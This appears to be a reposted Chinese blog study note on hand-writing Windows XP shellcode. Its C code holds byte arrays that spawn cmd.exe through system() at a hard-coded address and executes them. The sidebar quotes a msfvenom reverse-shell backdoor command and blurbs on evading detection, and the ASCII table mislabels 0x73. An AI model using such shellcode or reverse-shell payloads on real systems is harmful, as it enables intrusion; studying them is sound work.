shellcode的初步编写

最新推荐文章于 2022-02-25 19:38:17 发布
转载 最新推荐文章于 2022-02-25 19:38:17 发布 · 836 阅读 · 0
文章标签:

#byte #system #command #cmd #读书 #c

本文介绍了一个简单的Shellcode编写实例,通过具体的代码展示了如何利用系统调用来执行命令。文中提供了两种不同的Shellcode实现方式,并附带了必要的注释帮助理解。
部署运行你感兴趣的模型镜像
  1 //系统环境:xpsp2+Microsoft Visual Studio .NET 2003
  2 //这是我学习中写出来的。算是读书笔记一类的吧!
  3 //时间 20051203
  4 //内容是关于shellcode的初步编写。此时我的系统函数地址是0xC7,0x93,0xBF,0x77。也就是77BF93C7
  5 作者:emissary
  6 
  7 
  8 //这两天。听说当兵的那些人走了,不知道龚哲她是否也走了。
  9 //再放一表上来。以后可能会用到。
 10 /*
 11 61h        a
 12 62h        b
 13 63h        c
 14 64h        d
 15 65        e
 16 66        f
 17 67        g
 18 68        h
 19 69        i
 20 6a        j
 21 6b        k
 22 6c        l
 23 6d        m
 24 6e        n
 25 6f        o
 26 70        p
 27 71        q
 28 72        r
 29 73        x
 30 74        t
 31 75        u
 32 76        v
 33 77        w
 34 78        x
 35 79        y
 36 7a        z
 37 */
 38 
 39 #include <stdio.h>
 40 #include <windows.h>
 41 #include <winbase.h>
 42 
 43 //这个是网上的一代码。和我写的不一样。环境不同。但两个都能用。
 44 char shellcode_command[] = {
 45 0x8B,0xE5, /*mov esp, ebp */
 46 0x55, /*push ebp */
 47 0x8B,0xEC, /*mov ebp, esp */
 48 0x83,0xEC,0x0C, /*sub esp, 0000000C */
 49 0xB8,0x63,0x6F,0x6D,0x6D, /*mov eax, 6D6D6F63 */ 
 50 0x89,0x45,0xF4, /*mov dword ptr [ebp-0C], eax*/
 51 0xB8,0x61,0x6E,0x64,0x2E, /*mov eax, 2E646E61 */ 
 52 0x89,0x45,0xF8, /*mov dword ptr [ebp-08], eax*/
 53 0xB8,0x63,0x6F,0x6D,0x22, /*mov eax, 226D6F63 */ 
 54 0x89,0x45,0xFC, /*mov dword ptr [ebp-04], eax*/
 55 0x33,0xD2, /*xor edx, edx */
 56 0x88,0x55,0xFF, /*mov byte ptr [ebp-01], dl */
 57 0x8D,0x45,0xF4, /*lea eax, dword ptr [ebp-0C]*/
 58 0x50, /*push eax */
 59 0xB8,0xC7,0x93,0xBF,0x77, /*mov eax, system地址改成了我本机的。 */ 
 60 0xFF,0xD0 /*call eax */
 61 };
 62 
 63 
 64 //这个是我自己搞出来的code
 65 char shellcode_cmd[] ={
 66 0x8B,0xE5,
 67 0x55,
 68 0x8B,0xEC,       
 69 0x33,0xFF,
 70 0x57,
 71 0x83,0xEC,0x08,
 72 0xC6,0x45,0xF8,0x63,
 73 0xC6,0x45,0xF9,0x6D,
 74 0xC6,0x45,0xFA,0x64,
 75 0xC6,0x45,0xFB,0x2E,
 76 0xC6,0x45,0xFC,0x65,
 77 0xC6,0x45,0xFD,0x78,
 78 0xC6,0x45,0xFE,0x65,
 79 0x8D,0x45,0xF8,
 80 0x50,
 81 0xB8,0xC7,0x93,0xBF,0x77,
 82 0xFF,0xD0
 83 };
 84 //typedef void (*MYPROC)(LPTSTR);  //定义函数指针
 85 
 86 int main()
 87 {
 88 //HINSTANCE LibHandle;
 89 //MYPROC ProcAdd;
 90 //LibHandle = LoadLibrary("msvcrt.dll");
 91 //ProcAdd = (MYPROC) GetProcAddress(LibHandle,"system"); //查找System函数地址
 92 //(ProcAdd) ("cmd.exe");  
 93 //return 0;
 94 LoadLibrary("msvcrt.dll");
 95 ((void(*)(void))&shellcode_cmd)();//两个都可以运行。一个是command,一个是cmd。
 96 return 0;
 97 
 98 //__asm
 99 //{
100 //mov esp,ebp ; 
101   // push ebp ; 
102    //mov ebp,esp ;    把当前esp赋给ebp 
103 //xor edi,edi ;
104   // push edi ;压入0,esp-4,; 作用是构造字符串的结尾字符。 
105    //sub esp,08h ;    这个我不知道是什么意思来着。
106    //mov byte ptr [ebp-08h],63h ;  c
107    //mov byte ptr [ebp-07h],6dh ;  m
108    //mov byte ptr [ebp-06h],64h ;  d
109    //mov byte ptr [ebp-05h],2Eh ;  .
110   // mov byte ptr [ebp-04h],65h ;  e
111   // mov byte ptr [ebp-03h],78h ;  x
112   // mov byte ptr [ebp-02h],65h ;  e一个一个生成串
113  //  lea eax,[ebp-08h] ;   
114 //   push eax ;    串地址作为参数入栈
115   // mov eax, 0x77BF93C7 ;
116 //   call eax ;     call System函数的地址
117 //}
118 } 

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

BlueXray
关注
13、渗透测试中有效隐藏和执行Shellcode的技术指南
u6v7w8x的博客
08-03 40
本文深入介绍了在渗透测试中有效隐藏和执行Shellcode的技术,包括使用msfvenom混淆有效负载、创建C#、Go和Nim语言的Shellcode加载器。通过详细的技术分析与对比,为道德黑客提供多种绕过安全检测的方法,帮助在合法授权范围内完成测试任务。
shellcode加载器--从入门到放弃
Mccc_li的博客
03-12 4219
test https://www.freebuf.com/articles/system/133990.html https://www.freebuf.com/sectool/254891.html https://www.freebuf.com/articles/network/249014.html https://www.cnblogs.com/-qing-/p/12234148.html#_lab2_1_1 https://www.freebuf.com/articles/system/22823
投稿 | 初始ShellcodeShellcode执行工具编写思路
Ms08067安全实验室
04-19 560
文章来源|MS08067 公众号读者投稿本文作者:Arks7(Ms08067实验室读者)这是一段C++ 加载器的代码,代码来之倾旋大佬的博客,先看大佬给的注释。#include// 入口...
shellcode初步成就
weixin_33742618的博客
01-08 108
    最近一直在学习linux下shellcode编写,迷茫了很久。因为在实践看书上例子的时候,遇到了难题。一直运行不出结果。前两天突然找出了问题的所在,原来是栈保护机制的问题。GCC编译器、Linux操作系统提供了一些机制来防止缓冲区溢出这种攻击方法对系统产生危害。在Ubuntu和其他基于Linux内核的系统中,目前都采用内存地址随机化的机制来初始化堆栈,这将会使得猜测具体的内存地址变得十分...
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1202
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
windows的shellcode编写高级技巧
q1q2q3q4ln的专栏-随我一起研究程序
11-21 820
windows的shellcode编写高级技巧-(2013/11/20) win2k缓冲区溢出入门-(2013/11/20) windows密码泄露漏洞分析-(2013/11/20) 理解win2k和nt4系统及进程活动-(2013/11/20) 理解wind2k和nt4系统及进程活动-(2013/11/20) win2000登陆漏洞初步解决方法-(2013/11/20) win9x系
如何手动编写shellcode
weixin_34199335的博客
08-24 232
看来我是要从汇编入手做些事情了。汇编如今的用途不过是逆向工程,加解密,有害代码分析,漏洞挖掘以及一些有害代码生成,如病毒,缓冲区溢出攻击。首先申明这些我都不会,有些只知道皮毛。我连菜鸟都算不上,最多是条菜虫。 这几天看了看缓冲区溢出,写下来一点心得,一是希望有高人指导,二是总结一下。 今天说说shellcode的生成,当然是win32平台下的,linux本人没有什么研究(菜吧)。 she...
ShellCode编写实例—突破防火墙的ShellCode
P-Blog
08-30 1802
现在网络上获得控制台的ShellCode要么是在目标机上开一个端口,等待攻击者连接;要么是让目标机主动连接攻击者的主机,俗称反向连接。但前种方法一般都会被防火墙挡住,而后者反连不但需要攻击者有一个公网IP,而且也会被目标机端禁止外连访问的防火墙挡掉。那有没有更好的办法呢?    当然有了!不然大家认为WTF老大会让我在这里瞎折腾?!    第一种方法就是复用攻击时的Socket。我们在给目标机发送
打造Windows下自己的ShellCode
it技术学习
06-13 4501
适合读者:漏洞分析员、黑迷 前置知识:汇编阅读能力,漏洞调试基本步骤,VC使用方法 WTF:这几次的菜鸟版EXP系列文章都是重点讲解溢出编程的原理和思路,包括漏洞的定位,利用构造以及遇到限制时ShellCode的编码技巧等,但对ShellCode本身的编写,特别是Windows环境下ShellCode初步编写,却很少提及。在文章中都是说发扬“拿来主义”,看准外面现成的ShellCod
Shellcode编写全解】:CTF中的Shellcode编写 - 从编写到注入的全过程解析
本文全面探讨了Shellcode的基础知识、编写技巧、注入技术、载荷构造与隐藏技术以及安全性分析和防护措施,并讨论了Shellcode在CTF(Capture The Flag)竞赛中的应用和挑战。通过分析Shellcode的作用、组成及优化编写...
深入学习缓冲区溢出:Shellcode编写技术解析
"这篇文档是关于shellcode编写技术和缓冲区溢出教程的个人学习记录,作者希望通过重新整理和打字来系统学习这一主题。文档源于《黑手缓冲区溢出教程》,并提醒读者尊重原作者,支持正版书籍。文中提到了作者自学缓冲...
C与JavaScript格式Shellcode转换工具
例如,当发现一个安全漏洞后,研究者可能首先用C语言编写Shellcode进行初步验证,随后需要将其转换为JavaScript格式以便在浏览器或其他JavaScript环境中进行测试。这时,C与JavaScript格式的Shellcode相互转换工具就...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
热门推荐
民工哥的博客
02-23 1万+
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 4254
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7612
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 2137
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 3183
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 4614
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值